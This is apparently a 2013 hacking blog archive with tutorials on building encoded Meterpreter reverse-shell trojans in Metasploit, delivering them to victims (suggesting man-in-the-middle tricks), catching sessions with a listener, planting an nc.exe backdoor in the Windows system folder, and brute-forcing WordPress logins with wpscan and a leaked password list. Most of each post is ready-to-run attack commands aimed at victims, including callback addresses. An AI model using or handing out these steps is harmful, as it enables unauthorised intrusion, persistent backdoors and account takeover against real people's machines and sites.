Posts

Showing posts from June, 2013

Upload nc.exe "OSbackdoor" to Victim Computer

Hallo guy's =)) Tonight i'm back again to learning exploitation Windows =)) and now i share this tutorial for you all =) oke now just for fun and just for learning =)) First Step : Make a new trojan and encoding trojan using metasploit framework: # msfpayload windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 R | msfencode -a x86 -c 5 -b '\xff' -e x86/shikata_ga_nai -t exe > /var/www/attacker.exe my IP-Address = 36.36.3.84 saving the trojan.exe in directory /var/www/ with the name attacker.exe then, I send trojan to victim's computer ( you can use MITM to get the attention of the victim ) now, we run a multi handler for listening meterpreter session from victim computer : # msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 E After getting meterpreter, then we upload nc.exe backdoor to the victim's computer : meterpreter > upload (PATH YOUR Nc.exe) C:\\WINDOWS\\system32\\ the bac

Wpscan Attack Wordpress

Image
Equipments: 1. Wpscan 2. Rockyou (Wordlist) Install and Fixed Wpscan on Kali Linux  http://h2-exploitation.blogspot.com/2013/06/fix-wpscan-on-kali-linux.html Download Rockyou (wordlist) Directly stage to attacks =)) Run a wpscan : # cd /usr/share/wpscan/ && ./wpscan.rb --help there are many options of these commands, but only a few that will I use this testing: The next remedy simply by adding the target of call - url "www.target.com" or "http://www.target.com/PATH/ and then add the - enumerate [OPTION] as shown below. # ./wpscan.rb --url "www.your-target.com/PATH/" --enumerate P --url =  The wordPress URL/domain to scan --enumerate P = Enumerate installed plugins Seen above that I got 2 pieces of plugins. Next, look for username. # ./wpscan.rb --url  "www.your-target.com/PATH/" --enumerate u --enumerate u =  Enumerate users huyuuu, I get a username " admin " Next. perform brute force against

Fix Wpscan on Kali Linux

Image
How to fix wpscan on kali linux, please following this step by step below oke Error Wpscann from kali linux: Error : [ERROR] The option: timeout is invalid. Trace : /usr/lib/ruby/vendor_ruby/ethon/multi.rb:103:in `block in set_attributes' /usr/lib/ruby/vendor_ruby/ethon/multi.rb:101:in `each_pair' /usr/lib/ruby/vendor_ruby/ethon/multi.rb:101:in `set_attributes' /usr/lib/ruby/vendor_ruby/ethon/multi.rb:86:in `initialize' /usr/lib/ruby/vendor_ruby/typhoeus/hydra.rb:95:in `new' /usr/lib/ruby/vendor_ruby/typhoeus/hydra.rb:95:in `initialize' /usr/share/wpscan/lib/browser.rb:48:in `new' /usr/share/wpscan/lib/browser.rb:48:in `initialize' /usr/share/wpscan/lib/browser.rb:62:in `new' /usr/share/wpscan/lib/browser.rb:62:in `instance' /usr/share/wpscan/lib/wpscan/wp_target.rb:43:in `initialize' /usr/bin/wpscan:51:in `new' /usr/bin/wpscan:51:in `<main>' remove directory wpscan: rm -rf /usr/share/wpscan/ ne

Armitage Tutorial "simple exploitation"

Image
I tried for the first time pentest tools named Armitage  and it helps me in doing exploits to gain access to the command of computer my target. Equipments: 1. Armitage  2. Metasploit Please download the above equipment if you do not have. OS : Kali Linux how to use it, please see the video below : Auhtor by : Hidemichi-Hiroyuki a.k.a [H2]

reasoning and methods to attack

Image
a person who likes to do penetration testing and have a high sense of action and the absolute methods can weaken its victims. how we do it, please refer to the illustration that I created below :) Equipment: 1. Metasploit before, i will to run postgresql in metasploit: #  service postgresql start ; service metasploit start Next, I create a combination new payload with the name test.exe # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.164.241.222 LPORT=4444 EXITFUNC=thread -e x86/shikata_ga_nai -a x86 -f exe > /var/www/test.exe -p windows/meterpreter/reverse_tcp = payload that I use LHOST = my Ip-Address LPORT = port to listen EXITFUNC =Extra Options x86/shikata_ga_nai = encoding that i use x68 = for architecture exe = output file /var/www/test.exe = i store it in the directory /var/www/ with the name test.exe The next step I run a multi handler: # msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.164.241.222 LPORT=4444